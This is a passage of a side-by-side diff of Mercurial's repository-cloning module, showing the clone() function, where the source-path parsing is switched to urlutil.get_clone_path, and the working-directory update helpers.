604 if not os.path.exists(dstcachedir):
605 os.mkdir(dstcachedir)
605 os.mkdir(dstcachedir)
606 util.copyfile(srcfname, dstfname)
606 util.copyfile(srcfname, dstfname)
607
607
608
608
609 def clone(
609 def clone(
610 ui,
610 ui,
611 peeropts,
611 peeropts,
612 source,
612 source,
613 dest=None,
613 dest=None,
614 pull=False,
614 pull=False,
615 revs=None,
615 revs=None,
616 update=True,
616 update=True,
617 stream=False,
617 stream=False,
618 branch=None,
618 branch=None,
619 shareopts=None,
619 shareopts=None,
620 storeincludepats=None,
620 storeincludepats=None,
621 storeexcludepats=None,
621 storeexcludepats=None,
622 depth=None,
622 depth=None,
623 ):
623 ):
624 """Make a copy of an existing repository.
624 """Make a copy of an existing repository.
625
625
626 Create a copy of an existing repository in a new directory. The
626 Create a copy of an existing repository in a new directory. The
627 source and destination are URLs, as passed to the repository
627 source and destination are URLs, as passed to the repository
628 function. Returns a pair of repository peers, the source and
628 function. Returns a pair of repository peers, the source and
629 newly created destination.
629 newly created destination.
630
630
631 The location of the source is added to the new repository's
631 The location of the source is added to the new repository's
632 .hg/hgrc file, as the default to be used for future pulls and
632 .hg/hgrc file, as the default to be used for future pulls and
633 pushes.
633 pushes.
634
634
635 If an exception is raised, the partly cloned/updated destination
635 If an exception is raised, the partly cloned/updated destination
636 repository will be deleted.
636 repository will be deleted.
637
637
638 Arguments:
638 Arguments:
639
639
640 source: repository object or URL
640 source: repository object or URL
641
641
642 dest: URL of destination repository to create (defaults to base
642 dest: URL of destination repository to create (defaults to base
643 name of source repository)
643 name of source repository)
644
644
645 pull: always pull from source repository, even in local case or if the
645 pull: always pull from source repository, even in local case or if the
646 server prefers streaming
646 server prefers streaming
647
647
648 stream: stream raw data uncompressed from repository (fast over
648 stream: stream raw data uncompressed from repository (fast over
649 LAN, slow over WAN)
649 LAN, slow over WAN)
650
650
651 revs: revision to clone up to (implies pull=True)
651 revs: revision to clone up to (implies pull=True)
652
652
653 update: update working directory after clone completes, if
653 update: update working directory after clone completes, if
654 destination is local repository (True means update to default rev,
654 destination is local repository (True means update to default rev,
655 anything else is treated as a revision)
655 anything else is treated as a revision)
656
656
657 branch: branches to clone
657 branch: branches to clone
658
658
659 shareopts: dict of options to control auto sharing behavior. The "pool" key
659 shareopts: dict of options to control auto sharing behavior. The "pool" key
660 activates auto sharing mode and defines the directory for stores. The
660 activates auto sharing mode and defines the directory for stores. The
661 "mode" key determines how to construct the directory name of the shared
661 "mode" key determines how to construct the directory name of the shared
662 repository. "identity" means the name is derived from the node of the first
662 repository. "identity" means the name is derived from the node of the first
663 changeset in the repository. "remote" means the name is derived from the
663 changeset in the repository. "remote" means the name is derived from the
664 remote's path/URL. Defaults to "identity."
664 remote's path/URL. Defaults to "identity."
665
665
666 storeincludepats and storeexcludepats: sets of file patterns to include and
666 storeincludepats and storeexcludepats: sets of file patterns to include and
667 exclude in the repository copy, respectively. If not defined, all files
667 exclude in the repository copy, respectively. If not defined, all files
668 will be included (a "full" clone). Otherwise a "narrow" clone containing
668 will be included (a "full" clone). Otherwise a "narrow" clone containing
669 only the requested files will be performed. If ``storeincludepats`` is not
669 only the requested files will be performed. If ``storeincludepats`` is not
670 defined but ``storeexcludepats`` is, ``storeincludepats`` is assumed to be
670 defined but ``storeexcludepats`` is, ``storeincludepats`` is assumed to be
671 ``path:.``. If both are empty sets, no files will be cloned.
671 ``path:.``. If both are empty sets, no files will be cloned.
672 """
672 """
673
673
674 if isinstance(source, bytes):
674 if isinstance(source, bytes):
675 origsource = ui.expandpath(source)
675 src = urlutil.get_clone_path(ui, source, branch)
676 source, branches = urlutil.parseurl(origsource, branch)
676 origsource, source, branches = src
677 srcpeer = peer(ui, peeropts, source)
677 srcpeer = peer(ui, peeropts, source)
678 else:
678 else:
679 srcpeer = source.peer() # in case we were called with a localrepo
679 srcpeer = source.peer() # in case we were called with a localrepo
680 branches = (None, branch or [])
680 branches = (None, branch or [])
681 origsource = source = srcpeer.url()
681 origsource = source = srcpeer.url()
682 srclock = destlock = cleandir = None
682 srclock = destlock = cleandir = None
683 destpeer = None
683 destpeer = None
684 try:
684 try:
685 revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs)
685 revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs)
686
686
687 if dest is None:
687 if dest is None:
688 dest = defaultdest(source)
688 dest = defaultdest(source)
689 if dest:
689 if dest:
690 ui.status(_(b"destination directory: %s\n") % dest)
690 ui.status(_(b"destination directory: %s\n") % dest)
691 else:
691 else:
692 dest = ui.expandpath(dest)
692 dest = ui.expandpath(dest)
693
693
694 dest = urlutil.urllocalpath(dest)
694 dest = urlutil.urllocalpath(dest)
695 source = urlutil.urllocalpath(source)
695 source = urlutil.urllocalpath(source)
696
696
697 if not dest:
697 if not dest:
698 raise error.InputError(_(b"empty destination path is not valid"))
698 raise error.InputError(_(b"empty destination path is not valid"))
699
699
700 destvfs = vfsmod.vfs(dest, expandpath=True)
700 destvfs = vfsmod.vfs(dest, expandpath=True)
701 if destvfs.lexists():
701 if destvfs.lexists():
702 if not destvfs.isdir():
702 if not destvfs.isdir():
703 raise error.InputError(
703 raise error.InputError(
704 _(b"destination '%s' already exists") % dest
704 _(b"destination '%s' already exists") % dest
705 )
705 )
706 elif destvfs.listdir():
706 elif destvfs.listdir():
707 raise error.InputError(
707 raise error.InputError(
708 _(b"destination '%s' is not empty") % dest
708 _(b"destination '%s' is not empty") % dest
709 )
709 )
710
710
711 createopts = {}
711 createopts = {}
712 narrow = False
712 narrow = False
713
713
714 if storeincludepats is not None:
714 if storeincludepats is not None:
715 narrowspec.validatepatterns(storeincludepats)
715 narrowspec.validatepatterns(storeincludepats)
716 narrow = True
716 narrow = True
717
717
718 if storeexcludepats is not None:
718 if storeexcludepats is not None:
719 narrowspec.validatepatterns(storeexcludepats)
719 narrowspec.validatepatterns(storeexcludepats)
720 narrow = True
720 narrow = True
721
721
722 if narrow:
722 if narrow:
723 # Include everything by default if only exclusion patterns defined.
723 # Include everything by default if only exclusion patterns defined.
724 if storeexcludepats and not storeincludepats:
724 if storeexcludepats and not storeincludepats:
725 storeincludepats = {b'path:.'}
725 storeincludepats = {b'path:.'}
726
726
727 createopts[b'narrowfiles'] = True
727 createopts[b'narrowfiles'] = True
728
728
729 if depth:
729 if depth:
730 createopts[b'shallowfilestore'] = True
730 createopts[b'shallowfilestore'] = True
731
731
732 if srcpeer.capable(b'lfs-serve'):
732 if srcpeer.capable(b'lfs-serve'):
733 # Repository creation honors the config if it disabled the extension, so
733 # Repository creation honors the config if it disabled the extension, so
734 # we can't just announce that lfs will be enabled. This check avoids
734 # we can't just announce that lfs will be enabled. This check avoids
735 # saying that lfs will be enabled, and then saying it's an unknown
735 # saying that lfs will be enabled, and then saying it's an unknown
736 # feature. The lfs creation option is set in either case so that a
736 # feature. The lfs creation option is set in either case so that a
737 # requirement is added. If the extension is explicitly disabled but the
737 # requirement is added. If the extension is explicitly disabled but the
738 # requirement is set, the clone aborts early, before transferring any
738 # requirement is set, the clone aborts early, before transferring any
739 # data.
739 # data.
740 createopts[b'lfs'] = True
740 createopts[b'lfs'] = True
741
741
742 if extensions.disabled_help(b'lfs'):
742 if extensions.disabled_help(b'lfs'):
743 ui.status(
743 ui.status(
744 _(
744 _(
745 b'(remote is using large file support (lfs), but it is '
745 b'(remote is using large file support (lfs), but it is '
746 b'explicitly disabled in the local configuration)\n'
746 b'explicitly disabled in the local configuration)\n'
747 )
747 )
748 )
748 )
749 else:
749 else:
750 ui.status(
750 ui.status(
751 _(
751 _(
752 b'(remote is using large file support (lfs); lfs will '
752 b'(remote is using large file support (lfs); lfs will '
753 b'be enabled for this repository)\n'
753 b'be enabled for this repository)\n'
754 )
754 )
755 )
755 )
756
756
757 shareopts = shareopts or {}
757 shareopts = shareopts or {}
758 sharepool = shareopts.get(b'pool')
758 sharepool = shareopts.get(b'pool')
759 sharenamemode = shareopts.get(b'mode')
759 sharenamemode = shareopts.get(b'mode')
760 if sharepool and islocal(dest):
760 if sharepool and islocal(dest):
761 sharepath = None
761 sharepath = None
762 if sharenamemode == b'identity':
762 if sharenamemode == b'identity':
763 # Resolve the name from the initial changeset in the remote
763 # Resolve the name from the initial changeset in the remote
764 # repository. This returns nullid when the remote is empty. It
764 # repository. This returns nullid when the remote is empty. It
765 # raises RepoLookupError if revision 0 is filtered or otherwise
765 # raises RepoLookupError if revision 0 is filtered or otherwise
766 # not available. If we fail to resolve, sharing is not enabled.
766 # not available. If we fail to resolve, sharing is not enabled.
767 try:
767 try:
768 with srcpeer.commandexecutor() as e:
768 with srcpeer.commandexecutor() as e:
769 rootnode = e.callcommand(
769 rootnode = e.callcommand(
770 b'lookup',
770 b'lookup',
771 {
771 {
772 b'key': b'0',
772 b'key': b'0',
773 },
773 },
774 ).result()
774 ).result()
775
775
776 if rootnode != nullid:
776 if rootnode != nullid:
777 sharepath = os.path.join(sharepool, hex(rootnode))
777 sharepath = os.path.join(sharepool, hex(rootnode))
778 else:
778 else:
779 ui.status(
779 ui.status(
780 _(
780 _(
781 b'(not using pooled storage: '
781 b'(not using pooled storage: '
782 b'remote appears to be empty)\n'
782 b'remote appears to be empty)\n'
783 )
783 )
784 )
784 )
785 except error.RepoLookupError:
785 except error.RepoLookupError:
786 ui.status(
786 ui.status(
787 _(
787 _(
788 b'(not using pooled storage: '
788 b'(not using pooled storage: '
789 b'unable to resolve identity of remote)\n'
789 b'unable to resolve identity of remote)\n'
790 )
790 )
791 )
791 )
792 elif sharenamemode == b'remote':
792 elif sharenamemode == b'remote':
793 sharepath = os.path.join(
793 sharepath = os.path.join(
794 sharepool, hex(hashutil.sha1(source).digest())
794 sharepool, hex(hashutil.sha1(source).digest())
795 )
795 )
796 else:
796 else:
797 raise error.Abort(
797 raise error.Abort(
798 _(b'unknown share naming mode: %s') % sharenamemode
798 _(b'unknown share naming mode: %s') % sharenamemode
799 )
799 )
800
800
801 # TODO this is a somewhat arbitrary restriction.
801 # TODO this is a somewhat arbitrary restriction.
802 if narrow:
802 if narrow:
803 ui.status(
803 ui.status(
804 _(b'(pooled storage not supported for narrow clones)\n')
804 _(b'(pooled storage not supported for narrow clones)\n')
805 )
805 )
806 sharepath = None
806 sharepath = None
807
807
808 if sharepath:
808 if sharepath:
809 return clonewithshare(
809 return clonewithshare(
810 ui,
810 ui,
811 peeropts,
811 peeropts,
812 sharepath,
812 sharepath,
813 source,
813 source,
814 srcpeer,
814 srcpeer,
815 dest,
815 dest,
816 pull=pull,
816 pull=pull,
817 rev=revs,
817 rev=revs,
818 update=update,
818 update=update,
819 stream=stream,
819 stream=stream,
820 )
820 )
821
821
822 srcrepo = srcpeer.local()
822 srcrepo = srcpeer.local()
823
823
824 abspath = origsource
824 abspath = origsource
825 if islocal(origsource):
825 if islocal(origsource):
826 abspath = os.path.abspath(urlutil.urllocalpath(origsource))
826 abspath = os.path.abspath(urlutil.urllocalpath(origsource))
827
827
828 if islocal(dest):
828 if islocal(dest):
829 cleandir = dest
829 cleandir = dest
830
830
831 copy = False
831 copy = False
832 if (
832 if (
833 srcrepo
833 srcrepo
834 and srcrepo.cancopy()
834 and srcrepo.cancopy()
835 and islocal(dest)
835 and islocal(dest)
836 and not phases.hassecret(srcrepo)
836 and not phases.hassecret(srcrepo)
837 ):
837 ):
838 copy = not pull and not revs
838 copy = not pull and not revs
839
839
840 # TODO this is a somewhat arbitrary restriction.
840 # TODO this is a somewhat arbitrary restriction.
841 if narrow:
841 if narrow:
842 copy = False
842 copy = False
843
843
844 if copy:
844 if copy:
845 try:
845 try:
846 # we use a lock here because if we race with commit, we
846 # we use a lock here because if we race with commit, we
847 # can end up with extra data in the cloned revlogs that's
847 # can end up with extra data in the cloned revlogs that's
848 # not pointed to by changesets, thus causing verify to
848 # not pointed to by changesets, thus causing verify to
849 # fail
849 # fail
850 srclock = srcrepo.lock(wait=False)
850 srclock = srcrepo.lock(wait=False)
851 except error.LockError:
851 except error.LockError:
852 copy = False
852 copy = False
853
853
854 if copy:
854 if copy:
855 srcrepo.hook(b'preoutgoing', throw=True, source=b'clone')
855 srcrepo.hook(b'preoutgoing', throw=True, source=b'clone')
856 hgdir = os.path.realpath(os.path.join(dest, b".hg"))
856 hgdir = os.path.realpath(os.path.join(dest, b".hg"))
857 if not os.path.exists(dest):
857 if not os.path.exists(dest):
858 util.makedirs(dest)
858 util.makedirs(dest)
859 else:
859 else:
860 # only clean up directories we create ourselves
860 # only clean up directories we create ourselves
861 cleandir = hgdir
861 cleandir = hgdir
862 try:
862 try:
863 destpath = hgdir
863 destpath = hgdir
864 util.makedir(destpath, notindexed=True)
864 util.makedir(destpath, notindexed=True)
865 except OSError as inst:
865 except OSError as inst:
866 if inst.errno == errno.EEXIST:
866 if inst.errno == errno.EEXIST:
867 cleandir = None
867 cleandir = None
868 raise error.Abort(
868 raise error.Abort(
869 _(b"destination '%s' already exists") % dest
869 _(b"destination '%s' already exists") % dest
870 )
870 )
871 raise
871 raise
872
872
873 destlock = copystore(ui, srcrepo, destpath)
873 destlock = copystore(ui, srcrepo, destpath)
874 # copy bookmarks over
874 # copy bookmarks over
875 srcbookmarks = srcrepo.vfs.join(b'bookmarks')
875 srcbookmarks = srcrepo.vfs.join(b'bookmarks')
876 dstbookmarks = os.path.join(destpath, b'bookmarks')
876 dstbookmarks = os.path.join(destpath, b'bookmarks')
877 if os.path.exists(srcbookmarks):
877 if os.path.exists(srcbookmarks):
878 util.copyfile(srcbookmarks, dstbookmarks)
878 util.copyfile(srcbookmarks, dstbookmarks)
879
879
880 dstcachedir = os.path.join(destpath, b'cache')
880 dstcachedir = os.path.join(destpath, b'cache')
881 for cache in cacheutil.cachetocopy(srcrepo):
881 for cache in cacheutil.cachetocopy(srcrepo):
882 _copycache(srcrepo, dstcachedir, cache)
882 _copycache(srcrepo, dstcachedir, cache)
883
883
884 # we need to re-init the repo after manually copying the data
884 # we need to re-init the repo after manually copying the data
885 # into it
885 # into it
886 destpeer = peer(srcrepo, peeropts, dest)
886 destpeer = peer(srcrepo, peeropts, dest)
887 srcrepo.hook(b'outgoing', source=b'clone', node=nullhex)
887 srcrepo.hook(b'outgoing', source=b'clone', node=nullhex)
888 else:
888 else:
889 try:
889 try:
890 # only pass ui when no srcrepo
890 # only pass ui when no srcrepo
891 destpeer = peer(
891 destpeer = peer(
892 srcrepo or ui,
892 srcrepo or ui,
893 peeropts,
893 peeropts,
894 dest,
894 dest,
895 create=True,
895 create=True,
896 createopts=createopts,
896 createopts=createopts,
897 )
897 )
898 except OSError as inst:
898 except OSError as inst:
899 if inst.errno == errno.EEXIST:
899 if inst.errno == errno.EEXIST:
900 cleandir = None
900 cleandir = None
901 raise error.Abort(
901 raise error.Abort(
902 _(b"destination '%s' already exists") % dest
902 _(b"destination '%s' already exists") % dest
903 )
903 )
904 raise
904 raise
905
905
906 if revs:
906 if revs:
907 if not srcpeer.capable(b'lookup'):
907 if not srcpeer.capable(b'lookup'):
908 raise error.Abort(
908 raise error.Abort(
909 _(
909 _(
910 b"src repository does not support "
910 b"src repository does not support "
911 b"revision lookup and so doesn't "
911 b"revision lookup and so doesn't "
912 b"support clone by revision"
912 b"support clone by revision"
913 )
913 )
914 )
914 )
915
915
916 # TODO this is batchable.
916 # TODO this is batchable.
917 remoterevs = []
917 remoterevs = []
918 for rev in revs:
918 for rev in revs:
919 with srcpeer.commandexecutor() as e:
919 with srcpeer.commandexecutor() as e:
920 remoterevs.append(
920 remoterevs.append(
921 e.callcommand(
921 e.callcommand(
922 b'lookup',
922 b'lookup',
923 {
923 {
924 b'key': rev,
924 b'key': rev,
925 },
925 },
926 ).result()
926 ).result()
927 )
927 )
928 revs = remoterevs
928 revs = remoterevs
929
929
930 checkout = revs[0]
930 checkout = revs[0]
931 else:
931 else:
932 revs = None
932 revs = None
933 local = destpeer.local()
933 local = destpeer.local()
934 if local:
934 if local:
935 if narrow:
935 if narrow:
936 with local.wlock(), local.lock():
936 with local.wlock(), local.lock():
937 local.setnarrowpats(storeincludepats, storeexcludepats)
937 local.setnarrowpats(storeincludepats, storeexcludepats)
938 narrowspec.copytoworkingcopy(local)
938 narrowspec.copytoworkingcopy(local)
939
939
940 u = urlutil.url(abspath)
940 u = urlutil.url(abspath)
941 defaulturl = bytes(u)
941 defaulturl = bytes(u)
942 local.ui.setconfig(b'paths', b'default', defaulturl, b'clone')
942 local.ui.setconfig(b'paths', b'default', defaulturl, b'clone')
943 if not stream:
943 if not stream:
944 if pull:
944 if pull:
945 stream = False
945 stream = False
946 else:
946 else:
947 stream = None
947 stream = None
948 # internal config: ui.quietbookmarkmove
948 # internal config: ui.quietbookmarkmove
949 overrides = {(b'ui', b'quietbookmarkmove'): True}
949 overrides = {(b'ui', b'quietbookmarkmove'): True}
950 with local.ui.configoverride(overrides, b'clone'):
950 with local.ui.configoverride(overrides, b'clone'):
951 exchange.pull(
951 exchange.pull(
952 local,
952 local,
953 srcpeer,
953 srcpeer,
954 revs,
954 revs,
955 streamclonerequested=stream,
955 streamclonerequested=stream,
956 includepats=storeincludepats,
956 includepats=storeincludepats,
957 excludepats=storeexcludepats,
957 excludepats=storeexcludepats,
958 depth=depth,
958 depth=depth,
959 )
959 )
960 elif srcrepo:
960 elif srcrepo:
961 # TODO lift restriction once exchange.push() accepts narrow
961 # TODO lift restriction once exchange.push() accepts narrow
962 # push.
962 # push.
963 if narrow:
963 if narrow:
964 raise error.Abort(
964 raise error.Abort(
965 _(
965 _(
966 b'narrow clone not available for '
966 b'narrow clone not available for '
967 b'remote destinations'
967 b'remote destinations'
968 )
968 )
969 )
969 )
970
970
971 exchange.push(
971 exchange.push(
972 srcrepo,
972 srcrepo,
973 destpeer,
973 destpeer,
974 revs=revs,
974 revs=revs,
975 bookmarks=srcrepo._bookmarks.keys(),
975 bookmarks=srcrepo._bookmarks.keys(),
976 )
976 )
977 else:
977 else:
978 raise error.Abort(
978 raise error.Abort(
979 _(b"clone from remote to remote not supported")
979 _(b"clone from remote to remote not supported")
980 )
980 )
981
981
982 cleandir = None
982 cleandir = None
983
983
984 destrepo = destpeer.local()
984 destrepo = destpeer.local()
985 if destrepo:
985 if destrepo:
986 template = uimod.samplehgrcs[b'cloned']
986 template = uimod.samplehgrcs[b'cloned']
987 u = urlutil.url(abspath)
987 u = urlutil.url(abspath)
988 u.passwd = None
988 u.passwd = None
989 defaulturl = bytes(u)
989 defaulturl = bytes(u)
990 destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl))
990 destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl))
991 destrepo.ui.setconfig(b'paths', b'default', defaulturl, b'clone')
991 destrepo.ui.setconfig(b'paths', b'default', defaulturl, b'clone')
992
992
993 if ui.configbool(b'experimental', b'remotenames'):
993 if ui.configbool(b'experimental', b'remotenames'):
994 logexchange.pullremotenames(destrepo, srcpeer)
994 logexchange.pullremotenames(destrepo, srcpeer)
995
995
996 if update:
996 if update:
997 if update is not True:
997 if update is not True:
998 with srcpeer.commandexecutor() as e:
998 with srcpeer.commandexecutor() as e:
999 checkout = e.callcommand(
999 checkout = e.callcommand(
1000 b'lookup',
1000 b'lookup',
1001 {
1001 {
1002 b'key': update,
1002 b'key': update,
1003 },
1003 },
1004 ).result()
1004 ).result()
1005
1005
1006 uprev = None
1006 uprev = None
1007 status = None
1007 status = None
1008 if checkout is not None:
1008 if checkout is not None:
1009 # Some extensions (at least hg-git and hg-subversion) have
1009 # Some extensions (at least hg-git and hg-subversion) have
1010 # a peer.lookup() implementation that returns a name instead
1010 # a peer.lookup() implementation that returns a name instead
1011 # of a nodeid. We work around it here until we've figured
1011 # of a nodeid. We work around it here until we've figured
1012 # out a better solution.
1012 # out a better solution.
1013 if len(checkout) == 20 and checkout in destrepo:
1013 if len(checkout) == 20 and checkout in destrepo:
1014 uprev = checkout
1014 uprev = checkout
1015 elif scmutil.isrevsymbol(destrepo, checkout):
1015 elif scmutil.isrevsymbol(destrepo, checkout):
1016 uprev = scmutil.revsymbol(destrepo, checkout).node()
1016 uprev = scmutil.revsymbol(destrepo, checkout).node()
1017 else:
1017 else:
1018 if update is not True:
1018 if update is not True:
1019 try:
1019 try:
1020 uprev = destrepo.lookup(update)
1020 uprev = destrepo.lookup(update)
1021 except error.RepoLookupError:
1021 except error.RepoLookupError:
1022 pass
1022 pass
1023 if uprev is None:
1023 if uprev is None:
1024 try:
1024 try:
1025 if destrepo._activebookmark:
1025 if destrepo._activebookmark:
1026 uprev = destrepo.lookup(destrepo._activebookmark)
1026 uprev = destrepo.lookup(destrepo._activebookmark)
1027 update = destrepo._activebookmark
1027 update = destrepo._activebookmark
1028 else:
1028 else:
1029 uprev = destrepo._bookmarks[b'@']
1029 uprev = destrepo._bookmarks[b'@']
1030 update = b'@'
1030 update = b'@'
1031 bn = destrepo[uprev].branch()
1031 bn = destrepo[uprev].branch()
1032 if bn == b'default':
1032 if bn == b'default':
1033 status = _(b"updating to bookmark %s\n" % update)
1033 status = _(b"updating to bookmark %s\n" % update)
1034 else:
1034 else:
1035 status = (
1035 status = (
1036 _(b"updating to bookmark %s on branch %s\n")
1036 _(b"updating to bookmark %s on branch %s\n")
1037 ) % (update, bn)
1037 ) % (update, bn)
1038 except KeyError:
1038 except KeyError:
1039 try:
1039 try:
1040 uprev = destrepo.branchtip(b'default')
1040 uprev = destrepo.branchtip(b'default')
1041 except error.RepoLookupError:
1041 except error.RepoLookupError:
1042 uprev = destrepo.lookup(b'tip')
1042 uprev = destrepo.lookup(b'tip')
1043 if not status:
1043 if not status:
1044 bn = destrepo[uprev].branch()
1044 bn = destrepo[uprev].branch()
1045 status = _(b"updating to branch %s\n") % bn
1045 status = _(b"updating to branch %s\n") % bn
1046 destrepo.ui.status(status)
1046 destrepo.ui.status(status)
1047 _update(destrepo, uprev)
1047 _update(destrepo, uprev)
1048 if update in destrepo._bookmarks:
1048 if update in destrepo._bookmarks:
1049 bookmarks.activate(destrepo, update)
1049 bookmarks.activate(destrepo, update)
1050 if destlock is not None:
1050 if destlock is not None:
1051 release(destlock)
1051 release(destlock)
1052 # here is a tiny windows were someone could end up writing the
1052 # here is a tiny windows were someone could end up writing the
1053 # repository before the cache are sure to be warm. This is "fine"
1053 # repository before the cache are sure to be warm. This is "fine"
1054 # as the only "bad" outcome would be some slowness. That potential
1054 # as the only "bad" outcome would be some slowness. That potential
1055 # slowness already affect reader.
1055 # slowness already affect reader.
1056 with destrepo.lock():
1056 with destrepo.lock():
1057 destrepo.updatecaches(full=True)
1057 destrepo.updatecaches(full=True)
1058 finally:
1058 finally:
1059 release(srclock, destlock)
1059 release(srclock, destlock)
1060 if cleandir is not None:
1060 if cleandir is not None:
1061 shutil.rmtree(cleandir, True)
1061 shutil.rmtree(cleandir, True)
1062 if srcpeer is not None:
1062 if srcpeer is not None:
1063 srcpeer.close()
1063 srcpeer.close()
1064 if destpeer and destpeer.local() is None:
1064 if destpeer and destpeer.local() is None:
1065 destpeer.close()
1065 destpeer.close()
1066 return srcpeer, destpeer
1066 return srcpeer, destpeer
1067
1067
1068
1068
1069 def _showstats(repo, stats, quietempty=False):
1069 def _showstats(repo, stats, quietempty=False):
1070 if quietempty and stats.isempty():
1070 if quietempty and stats.isempty():
1071 return
1071 return
1072 repo.ui.status(
1072 repo.ui.status(
1073 _(
1073 _(
1074 b"%d files updated, %d files merged, "
1074 b"%d files updated, %d files merged, "
1075 b"%d files removed, %d files unresolved\n"
1075 b"%d files removed, %d files unresolved\n"
1076 )
1076 )
1077 % (
1077 % (
1078 stats.updatedcount,
1078 stats.updatedcount,
1079 stats.mergedcount,
1079 stats.mergedcount,
1080 stats.removedcount,
1080 stats.removedcount,
1081 stats.unresolvedcount,
1081 stats.unresolvedcount,
1082 )
1082 )
1083 )
1083 )
1084
1084
1085
1085
1086 def updaterepo(repo, node, overwrite, updatecheck=None):
1086 def updaterepo(repo, node, overwrite, updatecheck=None):
1087 """Update the working directory to node.
1087 """Update the working directory to node.
1088
1088
1089 When overwrite is set, changes are clobbered, merged else
1089 When overwrite is set, changes are clobbered, merged else
1090
1090
1091 returns stats (see pydoc mercurial.merge.applyupdates)"""
1091 returns stats (see pydoc mercurial.merge.applyupdates)"""
1092 repo.ui.deprecwarn(
1092 repo.ui.deprecwarn(
1093 b'prefer merge.update() or merge.clean_update() over hg.updaterepo()',
1093 b'prefer merge.update() or merge.clean_update() over hg.updaterepo()',
1094 b'5.7',
1094 b'5.7',
1095 )
1095 )
1096 return mergemod._update(
1096 return mergemod._update(
1097 repo,
1097 repo,
1098 node,
1098 node,
1099 branchmerge=False,
1099 branchmerge=False,
1100 force=overwrite,
1100 force=overwrite,
1101 labels=[b'working copy', b'destination'],
1101 labels=[b'working copy', b'destination'],
1102 updatecheck=updatecheck,
1102 updatecheck=updatecheck,
1103 )
1103 )
1104
1104
1105
1105
1106 def update(repo, node, quietempty=False, updatecheck=None):
1106 def update(repo, node, quietempty=False, updatecheck=None):
1107 """update the working directory to node"""
1107 """update the working directory to node"""
1108 stats = mergemod.update(repo[node], updatecheck=updatecheck)
1108 stats = mergemod.update(repo[node], updatecheck=updatecheck)
1109 _showstats(repo, stats, quietempty)
1109 _showstats(repo, stats, quietempty)
1110 if stats.unresolvedcount:
1110 if stats.unresolvedcount:
1111 repo.ui.status(_(b"use 'hg resolve' to retry unresolved file merges\n"))
1111 repo.ui.status(_(b"use 'hg resolve' to retry unresolved file merges\n"))
1112 return stats.unresolvedcount > 0
1112 return stats.unresolvedcount > 0
1113
1113
1114
1114
1115 # naming conflict in clone()
1115 # naming conflict in clone()
1116 _update = update
1116 _update = update
1117
1117
1118
1118
1119 def clean(repo, node, show_stats=True, quietempty=False):
1119 def clean(repo, node, show_stats=True, quietempty=False):
1120 """forcibly switch the working directory to node, clobbering changes"""
1120 """forcibly switch the working directory to node, clobbering changes"""
1121 stats = mergemod.clean_update(repo[node])
1121 stats = mergemod.clean_update(repo[node])
1122 assert stats.unresolvedcount == 0
1122 assert stats.unresolvedcount == 0
1123 if show_stats:
1123 if show_stats:
1124 _showstats(repo, stats, quietempty)
1124 _showstats(repo, stats, quietempty)
1125 return False
1125 return False
1126
1126
1127
1127
1128 # naming conflict in updatetotally()
1128 # naming conflict in updatetotally()
1129 _clean = clean
1129 _clean = clean
1130
1130
1131 _VALID_UPDATECHECKS = {
1131 _VALID_UPDATECHECKS = {
1132 mergemod.UPDATECHECK_ABORT,
1132 mergemod.UPDATECHECK_ABORT,
1133 mergemod.UPDATECHECK_NONE,
1133 mergemod.UPDATECHECK_NONE,
1134 mergemod.UPDATECHECK_LINEAR,
1134 mergemod.UPDATECHECK_LINEAR,
1135 mergemod.UPDATECHECK_NO_CONFLICT,
1135 mergemod.UPDATECHECK_NO_CONFLICT,
1136 }
1136 }
1137
1137
1138
1138
1139 def updatetotally(ui, repo, checkout, brev, clean=False, updatecheck=None):
1139 def updatetotally(ui, repo, checkout, brev, clean=False, updatecheck=None):
1140 """Update the working directory with extra care for non-file components
1140 """Update the working directory with extra care for non-file components
1141
1141
1142 This takes care of non-file components below:
1142 This takes care of non-file components below:
1143
1143
1144 :bookmark: might be advanced or (in)activated
1144 :bookmark: might be advanced or (in)activated
1145
1145
1146 This takes arguments below:
1146 This takes arguments below:
1147
1147
1148 :checkout: to which revision the working directory is updated
1148 :checkout: to which revision the working directory is updated
1149 :brev: a name, which might be a bookmark to be activated after updating
1149 :brev: a name, which might be a bookmark to be activated after updating
1150 :clean: whether changes in the working directory can be discarded
1150 :clean: whether changes in the working directory can be discarded
1151 :updatecheck: how to deal with a dirty working directory
1151 :updatecheck: how to deal with a dirty working directory
1152
1152
1153 Valid values for updatecheck are the UPDATECHECK_* constants
1153 Valid values for updatecheck are the UPDATECHECK_* constants
1154 defined in the merge module. Passing `None` will result in using the
1154 defined in the merge module. Passing `None` will result in using the
1155 configured default.
1155 configured default.
1156
1156
1157 * ABORT: abort if the working directory is dirty
1157 * ABORT: abort if the working directory is dirty
1158 * NONE: don't check (merge working directory changes into destination)
1158 * NONE: don't check (merge working directory changes into destination)
1159 * LINEAR: check that update is linear before merging working directory
1159 * LINEAR: check that update is linear before merging working directory
1160 changes into destination
1160 changes into destination
1161 * NO_CONFLICT: check that the update does not result in file merges
1161 * NO_CONFLICT: check that the update does not result in file merges
1162
1162
1163 This returns whether conflict is detected at updating or not.
1163 This returns whether conflict is detected at updating or not.
1164 """
1164 """
1165 if updatecheck is None:
1165 if updatecheck is None:
1166 updatecheck = ui.config(b'commands', b'update.check')
1166 updatecheck = ui.config(b'commands', b'update.check')
1167 if updatecheck not in _VALID_UPDATECHECKS:
1167 if updatecheck not in _VALID_UPDATECHECKS:
1168 # If not configured, or invalid value configured
1168 # If not configured, or invalid value configured
1169 updatecheck = mergemod.UPDATECHECK_LINEAR
1169 updatecheck = mergemod.UPDATECHECK_LINEAR
1170 if updatecheck not in _VALID_UPDATECHECKS:
1170 if updatecheck not in _VALID_UPDATECHECKS:
1171 raise ValueError(
1171 raise ValueError(
1172 r'Invalid updatecheck value %r (can accept %r)'
1172 r'Invalid updatecheck value %r (can accept %r)'
1173 % (updatecheck, _VALID_UPDATECHECKS)
1173 % (updatecheck, _VALID_UPDATECHECKS)
1174 )
1174 )
1175 with repo.wlock():
1175 with repo.wlock():
1176 movemarkfrom = None
1176 movemarkfrom = None
1177 warndest = False
1177 warndest = False
1178 if checkout is None:
1178 if checkout is None:
1179 updata = destutil.destupdate(repo, clean=clean)
1179 updata = destutil.destupdate(repo, clean=clean)
1180 checkout, movemarkfrom, brev = updata
1180 checkout, movemarkfrom, brev = updata
1181 warndest = True
1181 warndest = True
1182
1182
1183 if clean:
1183 if clean:
1184 ret = _clean(repo, checkout)
